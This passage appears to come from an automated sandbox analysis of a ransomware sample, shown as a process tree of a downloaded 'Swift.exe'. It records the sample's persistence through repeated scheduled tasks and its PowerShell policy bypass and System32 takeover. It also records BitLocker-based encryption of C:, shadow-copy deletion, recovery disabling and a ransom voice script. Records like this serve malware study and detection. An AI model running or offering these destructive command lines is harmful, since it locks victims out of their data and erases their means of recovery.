                                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --instant-process --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --always-read-main-dll --field-trial-handle=4640,i,6920964938061681248,8807775465035364022,262144 --variations-seed-version --mojo-platform-channel-handle=4672 /prefetch:1
                                                                                                    4⤵
                                                                                                      PID:4728
                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4976,i,6920964938061681248,8807775465035364022,262144 --variations-seed-version --mojo-platform-channel-handle=5040 /prefetch:8
                                                                                                      4⤵
                                                                                                        PID:4740
                                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4292,i,6920964938061681248,8807775465035364022,262144 --variations-seed-version --mojo-platform-channel-handle=5056 /prefetch:8
                                                                                                        4⤵
                                                                                                          PID:5424
                                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --always-read-main-dll --field-trial-handle=5396,i,6920964938061681248,8807775465035364022,262144 --variations-seed-version --mojo-platform-channel-handle=5440 /prefetch:1
                                                                                                          4⤵
                                                                                                            PID:1600
                                                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=604,i,6920964938061681248,8807775465035364022,262144 --variations-seed-version --mojo-platform-channel-handle=5740 /prefetch:8
                                                                                                            4⤵
                                                                                                            • Loads dropped DLL
                                                                                                            PID:3156
                                                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5756,i,6920964938061681248,8807775465035364022,262144 --variations-seed-version --mojo-platform-channel-handle=4388 /prefetch:8
                                                                                                            4⤵
                                                                                                            • Loads dropped DLL
                                                                                                            PID:3116
                                                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5820,i,6920964938061681248,8807775465035364022,262144 --variations-seed-version --mojo-platform-channel-handle=5724 /prefetch:8
                                                                                                            4⤵
                                                                                                            • Loads dropped DLL
                                                                                                            PID:3184
                                                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5884,i,6920964938061681248,8807775465035364022,262144 --variations-seed-version --mojo-platform-channel-handle=5048 /prefetch:8
                                                                                                            4⤵
                                                                                                              PID:760
                                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5184,i,6920964938061681248,8807775465035364022,262144 --variations-seed-version --mojo-platform-channel-handle=5920 /prefetch:8
                                                                                                              4⤵
                                                                                                                PID:5376
                                                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5940,i,6920964938061681248,8807775465035364022,262144 --variations-seed-version --mojo-platform-channel-handle=6068 /prefetch:8
                                                                                                                4⤵
                                                                                                                  PID:6140
                                                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6068,i,6920964938061681248,8807775465035364022,262144 --variations-seed-version --mojo-platform-channel-handle=5576 /prefetch:8
                                                                                                                  4⤵
                                                                                                                    PID:6544
                                                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.4355 --string-annotations --gpu-preferences=UAAAAAAAAADoAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAABCAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=5052,i,6920964938061681248,8807775465035364022,262144 --variations-seed-version --mojo-platform-channel-handle=5936 /prefetch:8
                                                                                                                    4⤵
                                                                                                                      PID:4432
                                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5284,i,6920964938061681248,8807775465035364022,262144 --variations-seed-version --mojo-platform-channel-handle=5236 /prefetch:8
                                                                                                                      4⤵
                                                                                                                        PID:6816
                                                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe
                                                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"
                                                                                                                  1⤵
                                                                                                                    PID:4860
                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                    C:\Windows\system32\cmd.exe /c "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start
                                                                                                                    1⤵
                                                                                                                      PID:2020
                                                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start
                                                                                                                        2⤵
                                                                                                                          PID:5500
                                                                                                                      • C:\Windows\System32\rundll32.exe
                                                                                                                        C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                                                                                                        1⤵
                                                                                                                          PID:1116
                                                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe
                                                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"
                                                                                                                          1⤵
                                                                                                                            PID:3840
                                                                                                                          • C:\Program Files\7-Zip\7zFM.exe
                                                                                                                            "C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\Downloads\Swift.exe"
                                                                                                                            1⤵
                                                                                                                            • Suspicious behavior: GetForegroundWindowSpam
                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                            • Suspicious use of FindShellTrayWindow
                                                                                                                            PID:1680
                                                                                                                          • C:\Windows\system32\taskmgr.exe
                                                                                                                            "C:\Windows\system32\taskmgr.exe" /4
                                                                                                                            1⤵
                                                                                                                            • Checks SCSI registry key(s)
                                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                            • Suspicious use of FindShellTrayWindow
                                                                                                                            • Suspicious use of SendNotifyMessage
                                                                                                                            PID:5540
                                                                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"
                                                                                                                            1⤵
                                                                                                                              PID:4764
                                                                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --edge-skip-compat-layer-relaunch
                                                                                                                                2⤵
                                                                                                                                  PID:4048
                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                C:\Windows\system32\cmd.exe /c "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start
                                                                                                                                1⤵
                                                                                                                                  PID:1568
                                                                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start
                                                                                                                                    2⤵
                                                                                                                                      PID:4680
                                                                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe
                                                                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"
                                                                                                                                    1⤵
                                                                                                                                      PID:880
                                                                                                                                    • C:\Users\Admin\Downloads\Swift.exe
                                                                                                                                      "C:\Users\Admin\Downloads\Swift.exe"
                                                                                                                                      1⤵
                                                                                                                                      • Modifies WinLogon for persistence
                                                                                                                                      • Looks for VirtualBox Guest Additions in registry
                                                                                                                                      • Looks for VMWare Tools registry key
                                                                                                                                      • Checks BIOS information in registry
                                                                                                                                      • Checks computer location settings
                                                                                                                                      • Executes dropped EXE
                                                                                                                                      • Adds Run key to start application
                                                                                                                                      • Maps connected drives based on registry
                                                                                                                                      • Drops file in Windows directory
                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                      PID:4696
                                                                                                                                      • C:\Windows\SYSTEM32\CMD.exe
                                                                                                                                        "CMD" /C SchTaSKs /CrEAte /F /sc OnLoGoN /rl HighEst /tn "USER OOBE BROKER" /tr "C:\Windows\Sub\xdwdClient.exe" & exit
                                                                                                                                        2⤵
                                                                                                                                          PID:3256
                                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                                            SchTaSKs /CrEAte /F /sc OnLoGoN /rl HighEst /tn "USER OOBE BROKER" /tr "C:\Windows\Sub\xdwdClient.exe"
                                                                                                                                            3⤵
                                                                                                                                            • Scheduled Task/Job: Scheduled Task
                                                                                                                                            PID:732
                                                                                                                                        • C:\Windows\SYSTEM32\CMD.exe
                                                                                                                                          "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "XDWDidinaxui" /tr "C:\Windows\Sub\xdwdClient.exe" /RL HIGHEST & exit
                                                                                                                                          2⤵
                                                                                                                                            PID:1124
                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                              SchTaSKs /create /f /sc minute /mo -1 /tn "XDWDidinaxui" /tr "C:\Windows\Sub\xdwdClient.exe" /RL HIGHEST
                                                                                                                                              3⤵
                                                                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                                                                              PID:1540
                                                                                                                                          • C:\Windows\SYSTEM32\CMD.exe
                                                                                                                                            "CMD" /c SchTaSKs /create /f /sc minute /mo 5 /tn "xdwdhuitebeaneratnik" /tr "C:\Windows\Sub\xdwdWatchDog.exe" /RL HIGHEST & exit
                                                                                                                                            2⤵
                                                                                                                                              PID:2516
                                                                                                                                              • C:\Windows\system32\schtasks.exe
                                                                                                                                                SchTaSKs /create /f /sc minute /mo 5 /tn "xdwdhuitebeaneratnik" /tr "C:\Windows\Sub\xdwdWatchDog.exe" /RL HIGHEST
                                                                                                                                                3⤵
                                                                                                                                                • Scheduled Task/Job: Scheduled Task
                                                                                                                                                PID:4656
                                                                                                                                            • C:\Windows\SYSTEM32\CMD.exe
                                                                                                                                              "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "XDWDidinaxui" /tr "C:\Windows\Sub\xdwdClient.exe" /RL HIGHEST & exit
                                                                                                                                              2⤵
                                                                                                                                                PID:4200
                                                                                                                                                • C:\Windows\system32\schtasks.exe
                                                                                                                                                  SchTaSKs /create /f /sc minute /mo -1 /tn "XDWDidinaxui" /tr "C:\Windows\Sub\xdwdClient.exe" /RL HIGHEST
                                                                                                                                                  3⤵
                                                                                                                                                  • Scheduled Task/Job: Scheduled Task
                                                                                                                                                  PID:4404
                                                                                                                                              • C:\Windows\SYSTEM32\CMD.exe
                                                                                                                                                "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "XDWDidinaxui" /tr "C:\Windows\Sub\xdwdClient.exe" /RL HIGHEST & exit
                                                                                                                                                2⤵
                                                                                                                                                  PID:2964
                                                                                                                                                  • C:\Windows\system32\schtasks.exe
                                                                                                                                                    SchTaSKs /create /f /sc minute /mo -1 /tn "XDWDidinaxui" /tr "C:\Windows\Sub\xdwdClient.exe" /RL HIGHEST
                                                                                                                                                    3⤵
                                                                                                                                                    • Scheduled Task/Job: Scheduled Task
                                                                                                                                                    PID:4860
                                                                                                                                                • C:\Windows\SYSTEM32\CMD.exe
                                                                                                                                                  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "XDWDidinaxui" /tr "C:\Windows\Sub\xdwdClient.exe" /RL HIGHEST & exit
                                                                                                                                                  2⤵
                                                                                                                                                    PID:2592
                                                                                                                                                    • C:\Windows\system32\schtasks.exe
                                                                                                                                                      SchTaSKs /create /f /sc minute /mo -1 /tn "XDWDidinaxui" /tr "C:\Windows\Sub\xdwdClient.exe" /RL HIGHEST
                                                                                                                                                      3⤵
                                                                                                                                                      • Scheduled Task/Job: Scheduled Task
                                                                                                                                                      PID:1548
                                                                                                                                                  • C:\Windows\SYSTEM32\CMD.exe
                                                                                                                                                    "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "XDWDidinaxui" /tr "C:\Windows\Sub\xdwdClient.exe" /RL HIGHEST & exit
                                                                                                                                                    2⤵
                                                                                                                                                      PID:3960
                                                                                                                                                      • C:\Windows\system32\schtasks.exe
                                                                                                                                                        SchTaSKs /create /f /sc minute /mo -1 /tn "XDWDidinaxui" /tr "C:\Windows\Sub\xdwdClient.exe" /RL HIGHEST
                                                                                                                                                        3⤵
                                                                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                                                                        PID:3760
                                                                                                                                                    • C:\Windows\SYSTEM32\CMD.exe
                                                                                                                                                      "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "XDWDidinaxui" /tr "C:\Windows\Sub\xdwdClient.exe" /RL HIGHEST & exit
                                                                                                                                                      2⤵
                                                                                                                                                        PID:2132
                                                                                                                                                        • C:\Windows\system32\schtasks.exe
                                                                                                                                                          SchTaSKs /create /f /sc minute /mo -1 /tn "XDWDidinaxui" /tr "C:\Windows\Sub\xdwdClient.exe" /RL HIGHEST
                                                                                                                                                          3⤵
                                                                                                                                                          • Scheduled Task/Job: Scheduled Task
                                                                                                                                                          PID:6044
                                                                                                                                                      • C:\Windows\SYSTEM32\CMD.exe
                                                                                                                                                        "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "XDWDidinaxui" /tr "C:\Windows\Sub\xdwdClient.exe" /RL HIGHEST & exit
                                                                                                                                                        2⤵
                                                                                                                                                          PID:2524
                                                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                                                            SchTaSKs /create /f /sc minute /mo -1 /tn "XDWDidinaxui" /tr "C:\Windows\Sub\xdwdClient.exe" /RL HIGHEST
                                                                                                                                                            3⤵
                                                                                                                                                            • Scheduled Task/Job: Scheduled Task
                                                                                                                                                            PID:3256
                                                                                                                                                        • C:\Windows\SYSTEM32\CMD.exe
                                                                                                                                                          "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "XDWDidinaxui" /tr "C:\Windows\Sub\xdwdClient.exe" /RL HIGHEST & exit
                                                                                                                                                          2⤵
                                                                                                                                                            PID:4752
                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                              SchTaSKs /create /f /sc minute /mo -1 /tn "XDWDidinaxui" /tr "C:\Windows\Sub\xdwdClient.exe" /RL HIGHEST
                                                                                                                                                              3⤵
                                                                                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                                                                                              PID:3704
                                                                                                                                                          • C:\Windows\SYSTEM32\CMD.exe
                                                                                                                                                            "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "XDWDidinaxui" /tr "C:\Windows\Sub\xdwdClient.exe" /RL HIGHEST & exit
                                                                                                                                                            2⤵
                                                                                                                                                              PID:3820
                                                                                                                                                              • C:\Windows\system32\schtasks.exe
                                                                                                                                                                SchTaSKs /create /f /sc minute /mo -1 /tn "XDWDidinaxui" /tr "C:\Windows\Sub\xdwdClient.exe" /RL HIGHEST
                                                                                                                                                                3⤵
                                                                                                                                                                • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                PID:2264
                                                                                                                                                            • C:\Windows\SYSTEM32\CMD.exe
                                                                                                                                                              "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "XDWDidinaxui" /tr "C:\Windows\Sub\xdwdClient.exe" /RL HIGHEST & exit
                                                                                                                                                              2⤵
                                                                                                                                                                PID:5188
                                                                                                                                                                • C:\Windows\system32\schtasks.exe
                                                                                                                                                                  SchTaSKs /create /f /sc minute /mo -1 /tn "XDWDidinaxui" /tr "C:\Windows\Sub\xdwdClient.exe" /RL HIGHEST
                                                                                                                                                                  3⤵
                                                                                                                                                                  • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                  PID:5400
                                                                                                                                                              • C:\Windows\SYSTEM32\CMD.exe
                                                                                                                                                                "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "XDWDidinaxui" /tr "C:\Windows\Sub\xdwdClient.exe" /RL HIGHEST & exit
                                                                                                                                                                2⤵
                                                                                                                                                                  PID:3712
                                                                                                                                                                  • C:\Windows\system32\schtasks.exe
                                                                                                                                                                    SchTaSKs /create /f /sc minute /mo -1 /tn "XDWDidinaxui" /tr "C:\Windows\Sub\xdwdClient.exe" /RL HIGHEST
                                                                                                                                                                    3⤵
                                                                                                                                                                    • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                    PID:2472
                                                                                                                                                                • C:\Windows\SYSTEM32\CMD.exe
                                                                                                                                                                  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "XDWDidinaxui" /tr "C:\Windows\Sub\xdwdClient.exe" /RL HIGHEST & exit
                                                                                                                                                                  2⤵
                                                                                                                                                                    PID:3680
                                                                                                                                                                    • C:\Windows\system32\schtasks.exe
                                                                                                                                                                      SchTaSKs /create /f /sc minute /mo -1 /tn "XDWDidinaxui" /tr "C:\Windows\Sub\xdwdClient.exe" /RL HIGHEST
                                                                                                                                                                      3⤵
                                                                                                                                                                      • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                      PID:5888
                                                                                                                                                                  • C:\Windows\SYSTEM32\CMD.exe
                                                                                                                                                                    "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "XDWDidinaxui" /tr "C:\Windows\Sub\xdwdClient.exe" /RL HIGHEST & exit
                                                                                                                                                                    2⤵
                                                                                                                                                                      PID:4680
                                                                                                                                                                      • C:\Windows\system32\schtasks.exe
                                                                                                                                                                        SchTaSKs /create /f /sc minute /mo -1 /tn "XDWDidinaxui" /tr "C:\Windows\Sub\xdwdClient.exe" /RL HIGHEST
                                                                                                                                                                        3⤵
                                                                                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                        PID:2668
                                                                                                                                                                    • C:\Windows\SYSTEM32\CMD.exe
                                                                                                                                                                      "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "XDWDidinaxui" /tr "C:\Windows\Sub\xdwdClient.exe" /RL HIGHEST & exit
                                                                                                                                                                      2⤵
                                                                                                                                                                        PID:3472
                                                                                                                                                                        • C:\Windows\system32\schtasks.exe
                                                                                                                                                                          SchTaSKs /create /f /sc minute /mo -1 /tn "XDWDidinaxui" /tr "C:\Windows\Sub\xdwdClient.exe" /RL HIGHEST
                                                                                                                                                                          3⤵
                                                                                                                                                                          • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                          PID:2664
                                                                                                                                                                      • C:\Windows\SYSTEM32\CMD.exe
                                                                                                                                                                        "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "XDWDidinaxui" /tr "C:\Windows\Sub\xdwdClient.exe" /RL HIGHEST & exit
                                                                                                                                                                        2⤵
                                                                                                                                                                          PID:4420
                                                                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                                                                            SchTaSKs /create /f /sc minute /mo -1 /tn "XDWDidinaxui" /tr "C:\Windows\Sub\xdwdClient.exe" /RL HIGHEST
                                                                                                                                                                            3⤵
                                                                                                                                                                            • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                            PID:2464
                                                                                                                                                                        • C:\Windows\SYSTEM32\CMD.exe
                                                                                                                                                                          "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "XDWDidinaxui" /tr "C:\Windows\Sub\xdwdClient.exe" /RL HIGHEST & exit
                                                                                                                                                                          2⤵
                                                                                                                                                                            PID:4596
                                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                                              SchTaSKs /create /f /sc minute /mo -1 /tn "XDWDidinaxui" /tr "C:\Windows\Sub\xdwdClient.exe" /RL HIGHEST
                                                                                                                                                                              3⤵
                                                                                                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                              PID:5388
                                                                                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                                                                                            "C:\Windows\System32\cmd.exe" /c start /b powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\miockzds.rls.exe"' & exit
                                                                                                                                                                            2⤵
                                                                                                                                                                              PID:3820
                                                                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\miockzds.rls.exe"'
                                                                                                                                                                                3⤵
                                                                                                                                                                                • Loads dropped DLL
                                                                                                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                PID:2412
                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\miockzds.rls.exe
                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\miockzds.rls.exe"
                                                                                                                                                                                  4⤵
                                                                                                                                                                                  • Checks computer location settings
                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                                                  • Drops file in System32 directory
                                                                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                  PID:2964
                                                                                                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                                                                                                    "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32 && icacls C:\Windows\System32 /grant "%username%:F"
                                                                                                                                                                                    5⤵
                                                                                                                                                                                      PID:2416
                                                                                                                                                                                      • C:\Windows\system32\takeown.exe
                                                                                                                                                                                        takeown /f C:\Windows\System32
                                                                                                                                                                                        6⤵
                                                                                                                                                                                        • Possible privilege escalation attempt
                                                                                                                                                                                        • Modifies file permissions
                                                                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                        PID:1088
                                                                                                                                                                                      • C:\Windows\system32\icacls.exe
                                                                                                                                                                                        icacls C:\Windows\System32 /grant "Admin:F"
                                                                                                                                                                                        6⤵
                                                                                                                                                                                        • Possible privilege escalation attempt
                                                                                                                                                                                        • Modifies file permissions
                                                                                                                                                                                        PID:2144
                                                                                                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                                                                                                      "C:\Windows\System32\cmd.exe" /C reg add HKLM\SOFTWARE\Policies\Microsoft\FVE /v EnableBDEWithNoTPM /t REG_DWORD /d 1 /f
                                                                                                                                                                                      5⤵
                                                                                                                                                                                        PID:2752
                                                                                                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                                                                                                          reg add HKLM\SOFTWARE\Policies\Microsoft\FVE /v EnableBDEWithNoTPM /t REG_DWORD /d 1 /f
                                                                                                                                                                                          6⤵
                                                                                                                                                                                          • Modifies registry key
                                                                                                                                                                                          PID:1196
                                                                                                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                                                                                                        "C:\Windows\System32\cmd.exe" /C reg add HKLM\SOFTWARE\Policies\Microsoft\FVE /v UseAdvancedStartup /t REG_DWORD /d 1 /f
                                                                                                                                                                                        5⤵
                                                                                                                                                                                          PID:5888
                                                                                                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                                                                                                            reg add HKLM\SOFTWARE\Policies\Microsoft\FVE /v UseAdvancedStartup /t REG_DWORD /d 1 /f
                                                                                                                                                                                            6⤵
                                                                                                                                                                                            • Modifies registry key
                                                                                                                                                                                            PID:1472
                                                                                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                                                                                          "C:\Windows\System32\cmd.exe" /C manage-bde -on C: -pw -rk C:\key.bin
                                                                                                                                                                                          5⤵
                                                                                                                                                                                            PID:5976
                                                                                                                                                                                            • C:\Windows\system32\manage-bde.exe
                                                                                                                                                                                              manage-bde -on C: -pw -rk C:\key.bin
                                                                                                                                                                                              6⤵
                                                                                                                                                                                              • Loads dropped DLL
                                                                                                                                                                                              PID:4568
                                                                                                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                                                                                                            "C:\Windows\System32\cmd.exe" /C cipher /w:C:\key.bin
                                                                                                                                                                                            5⤵
                                                                                                                                                                                              PID:3160
                                                                                                                                                                                              • C:\Windows\system32\cipher.exe
                                                                                                                                                                                                cipher /w:C:\key.bin
                                                                                                                                                                                                6⤵
                                                                                                                                                                                                • Loads dropped DLL
                                                                                                                                                                                                PID:1828
                                                                                                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                                                                                                              "C:\Windows\System32\cmd.exe" /C reagentc /disable && vssadmin delete shadows /all /quiet
                                                                                                                                                                                              5⤵
                                                                                                                                                                                                PID:4976
                                                                                                                                                                                                • C:\Windows\system32\ReAgentc.exe
                                                                                                                                                                                                  reagentc /disable
                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                                                                  • Drops file in System32 directory
                                                                                                                                                                                                  PID:2984
                                                                                                                                                                                                • C:\Windows\system32\vssadmin.exe
                                                                                                                                                                                                  vssadmin delete shadows /all /quiet
                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                                                                  • Interacts with shadow copies
                                                                                                                                                                                                  PID:4376
                                                                                                                                                                                              • C:\Windows\System32\WormLocker2.0.exe
                                                                                                                                                                                                "C:\Windows\System32\WormLocker2.0.exe"
                                                                                                                                                                                                5⤵
                                                                                                                                                                                                • Modifies WinLogon for persistence
                                                                                                                                                                                                • Checks computer location settings
                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                • Loads dropped DLL
                                                                                                                                                                                                • Modifies registry class
                                                                                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                PID:7096
                                                                                                                                                                                                • C:\Windows\System32\WScript.exe
                                                                                                                                                                                                  "C:\Windows\System32\WScript.exe" "C:\Windows\System32\ransom_voice.vbs"
                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                                                                  PID:6608
                                                                                                                                                                                        • C:\Windows\SYSTEM32\CMD.exe
                                                                                                                                                                                          "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "XDWDidinaxui" /tr "C:\Windows\Sub\xdwdClient.exe" /RL HIGHEST & exit
                                                                                                                                                                                          2⤵
                                                                                                                                                                                            PID:2772
                                                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                              SchTaSKs /create /f /sc minute /mo -1 /tn "XDWDidinaxui" /tr "C:\Windows\Sub\xdwdClient.exe" /RL HIGHEST
                                                                                                                                                                                              3⤵
                                                                                                                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                              PID:4236
                                                                                                                                                                                          • C:\Windows\SYSTEM32\CMD.exe
